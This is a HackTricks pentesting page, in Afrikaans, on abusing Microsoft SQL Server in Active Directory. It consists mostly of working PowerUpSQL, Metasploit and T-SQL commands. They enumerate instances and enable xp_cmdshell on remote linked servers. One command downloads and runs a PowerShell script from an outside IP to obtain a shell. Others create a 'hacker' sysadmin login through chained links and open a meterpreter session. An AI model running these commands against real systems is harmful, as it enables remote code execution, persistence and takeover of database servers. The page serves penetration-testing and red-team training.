hacktricks/windows-hardening/active-directory-methodology/abusing-ad-mssql.md

266 lines
13 KiB
Markdown
Raw Normal View History

2024-02-11 02:07:06 +00:00
# MSSQL AD Misbruik
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 02:07:06 +00:00
## **MSSQL Enumerasie / Ontdekking**
2024-02-11 02:07:06 +00:00
Die Powershell-module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is baie nuttig in hierdie geval.
2022-08-15 13:00:19 +00:00
```powershell
Import-Module .\PowerupSQL.psd1
2022-08-15 13:00:19 +00:00
```
2024-02-11 02:07:06 +00:00
### Enumereer vanaf die netwerk sonder 'n domein-sessie
As jy nie 'n domein-sessie het nie, kan jy steeds die netwerk ondersoek vir inligting oor die Active Directory (AD) en MSSQL-databasisse. Hier is 'n paar tegnieke wat jy kan gebruik:
1. **DNS-terugvoering**: Deur DNS-navrae te stuur na die AD-domein, kan jy inligting bekom oor die AD-struktuur en die dienste wat beskikbaar is.
2. **LDAP-navrae**: Deur LDAP-navrae te stuur na die AD-domein, kan jy inligting bekom oor gebruikers, groepe, rekenaars en ander AD-entiteite.
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
3. **NetBIOS-navrae**: Deur NetBIOS-navrae te stuur na die AD-domein, kan jy inligting bekom oor die AD-struktuur en die dienste wat beskikbaar is.
2024-02-11 02:07:06 +00:00
4. **MSSQL-verbindingsversoeke**: Deur MSSQL-verbindingsversoeke te stuur na die AD-domein, kan jy inligting bekom oor die MSSQL-databasisse wat beskikbaar is.
Dit is belangrik om hierdie tegnieke met sorg te gebruik en slegs te gebruik vir wettige doeleindes, soos pentesting of netwerkbestuur.
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP Verbose Threads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
2022-08-15 13:00:19 +00:00
```
2024-02-11 02:07:06 +00:00
### Enumereer van binne die domein
Om 'n aktiewe directory (AD) MSSQL-databasis te misbruik, moet jy eers binne die domein enumerateer. Hier is 'n paar metodes wat jy kan gebruik om dit te doen:
#### 1. Gebruik van nmap
Gebruik die nmap-hulpmiddel om die MSSQL-poorte in die domein te skandeer. Jy kan die volgende opdrag gebruik:
```
nmap -p 1433 --open <domein>
```
Hierdie opdrag sal die MSSQL-poorte (1433) in die gespesifiseerde domein skandeer en die oop poorte aantoon.
#### 2. Gebruik van Metasploit
Metasploit is 'n kragtige hulpmiddel wat gebruik kan word om MSSQL-databasisse te enumerateer. Jy kan die volgende opdrag gebruik om 'n Metasploit-sessie te begin:
```
msfconsole
```
Binne Metasploit kan jy die `mssql_enum`-module gebruik om die MSSQL-databasisse in die domein te enumerateer. Voer die volgende opdrag in:
```
use auxiliary/scanner/mssql/mssql_enum
```
Stel die `RHOSTS`-opsie in op die IP-adres van die MSSQL-bedieners in die domein:
```
set RHOSTS <IP-adres>
```
Voer die module uit:
```
run
```
Metasploit sal die MSSQL-databasisse in die domein enumerateer en die resultate vertoon.
#### 3. Gebruik van PowerView
PowerView is 'n nuttige PowerShell-module wat gebruik kan word om AD-inligting te enumerateer. Jy kan die volgende opdrag gebruik om PowerView te importeer:
```
Import-Module PowerView
```
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
Om die MSSQL-databasisse in die domein te enumerateer, kan jy die `Get-DomainSQLServer`-funksie gebruik. Voer die volgende opdrag in:
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
```
Get-DomainSQLServer
```
PowerView sal die MSSQL-databasisse in die domein enumerateer en die resultate vertoon.
Deur hierdie metodes te gebruik, kan jy binne die domein enumerateer en die MSSQL-databasisse identifiseer wat jy kan misbruik.
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
2024-02-11 02:07:06 +00:00
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
2022-08-15 13:00:19 +00:00
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
2024-02-11 02:07:06 +00:00
## MSSQL Basiese Misbruik
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
### Toegang tot DB
2022-08-15 13:00:19 +00:00
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
2022-08-18 23:47:45 +00:00
# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
2022-08-15 13:00:19 +00:00
```
### MSSQL RCE
2024-02-11 02:07:06 +00:00
Dit mag ook moontlik wees om **opdragte uit te voer** binne die MSSQL-gashouer.
2022-08-15 13:00:19 +00:00
```powershell
2022-10-08 08:36:40 +00:00
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
2022-08-15 13:00:19 +00:00
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
2024-02-11 02:07:06 +00:00
Kyk in die bladsy wat in die **volgende afdeling genoem word hoe om dit handmatig te doen.**
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
### MSSQL Basiese Hacking Truuks
2022-08-15 13:00:19 +00:00
2022-10-09 17:44:56 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/)
2022-08-15 13:00:19 +00:00
{% endcontent-ref %}
2024-02-11 02:07:06 +00:00
## MSSQL Vertroue Skakels
2024-02-11 02:07:06 +00:00
As 'n MSSQL-instantie vertrou (databasis skakel) word deur 'n ander MSSQL-instantie. As die gebruiker voorregte het oor die vertroue databasis, sal hy in staat wees om **die vertroue verhouding te gebruik om navrae uit te voer in die ander instantie**. Hierdie vertroue kan geketting word en op 'n punt kan die gebruiker 'n verkeerd gekonfigureerde databasis vind waar hy opdragte kan uitvoer.
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
**Die skakels tussen databasisse werk selfs oor bos vertroue.**
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
### Powershell Misbruik
2022-08-15 13:00:19 +00:00
```powershell
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
2022-12-20 14:18:39 +00:00
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "<INSTANCE1>" -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "<INSTANCE2>"'
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv Verbose Instance "SQLServer1\Instance1"
2022-08-18 23:47:45 +00:00
#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
2022-09-04 09:37:14 +00:00
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
```
2022-07-28 09:46:19 +00:00
### Metasploit
2024-02-11 02:07:06 +00:00
Jy kan maklik vir vertroude skakels kyk met behulp van Metasploit.
```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
2024-02-11 02:07:06 +00:00
Let daarop dat metasploit slegs die `openquery()`-funksie in MSSQL sal probeer misbruik (so, as jy nie 'n bevel kan uitvoer met `openquery()` nie, sal jy die `EXECUTE`-metode **handmatig** moet probeer om bevele uit te voer, sien meer hieronder.)
2024-02-11 02:07:06 +00:00
### Handmatig - Openquery()
2024-02-11 02:07:06 +00:00
Vanaf **Linux** kan jy 'n MSSQL-konsoleskulp verkry met **sqsh** en **mssqlclient.py.**
2024-02-11 02:07:06 +00:00
Vanaf **Windows** kan jy ook die skakels vind en bevele handmatig uitvoer met 'n **MSSQL-kliënt soos** [**HeidiSQL**](https://www.heidisql.com)
2024-02-11 02:07:06 +00:00
_Meld aan met Windows-verifikasie:_
2022-07-28 09:46:19 +00:00
![](<../../.gitbook/assets/image (167) (1).png>)
2024-02-11 02:07:06 +00:00
#### Vind Vertrouenswaardige Skakels
2022-08-15 13:00:19 +00:00
```sql
select * from master..sysservers
```
![](<../../.gitbook/assets/image (168).png>)
2024-02-11 02:07:06 +00:00
#### Voer navrae uit in 'n betroubare skakel
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
Voer navrae uit deur die skakel (voorbeeld: vind meer skakels in die nuwe toeganklike instansie):
2022-08-15 13:00:19 +00:00
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
2024-02-11 02:07:06 +00:00
Kyk waar dubbele en enkele aanhalingstekens gebruik word, dit is belangrik om hulle op daardie manier te gebruik.
2022-08-15 13:00:19 +00:00
{% endhint %}
![](<../../.gitbook/assets/image (169).png>)
2024-02-11 02:07:06 +00:00
Jy kan hierdie vertroude skakelketting vir ewig handmatig voortgaan.
2022-08-15 13:00:19 +00:00
```sql
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("<computer2>", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
2024-02-11 02:07:06 +00:00
As jy nie aksies soos `exec xp_cmdshell` vanaf `openquery()` kan uitvoer nie, probeer met die `EXECUTE`-metode.
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
### Handleiding - EXECUTE
2024-02-11 02:07:06 +00:00
Jy kan ook vertroude skakels misbruik deur `EXECUTE` te gebruik:
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
2024-02-11 02:07:06 +00:00
## Plaaslike Privilege Escalation
2024-02-11 02:07:06 +00:00
Die **MSSQL plaaslike gebruiker** het gewoonlik 'n spesiale tipe voorreg genaamd **`SeImpersonatePrivilege`**. Dit stel die rekening in staat om "as 'n kliënt op te tree na verifikasie".
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
'n Strategie wat deur baie skrywers bedink is, is om 'n SYSTEM-diens te dwing om te verifieer by 'n bedrieglike of man-in-die-middel-diens wat die aanvaller skep. Hierdie bedrieglike diens kan dan optree as die SYSTEM-diens terwyl dit probeer verifieer.
2022-08-15 13:00:19 +00:00
2024-02-11 02:07:06 +00:00
[SweetPotato](https://github.com/CCob/SweetPotato) het 'n versameling van hierdie verskillende tegnieke wat uitgevoer kan word deur middel van Beacon se `execute-assembly`-opdrag.
2022-08-15 13:00:19 +00:00
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:07:06 +00:00
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
2022-04-28 16:01:33 +00:00
</details>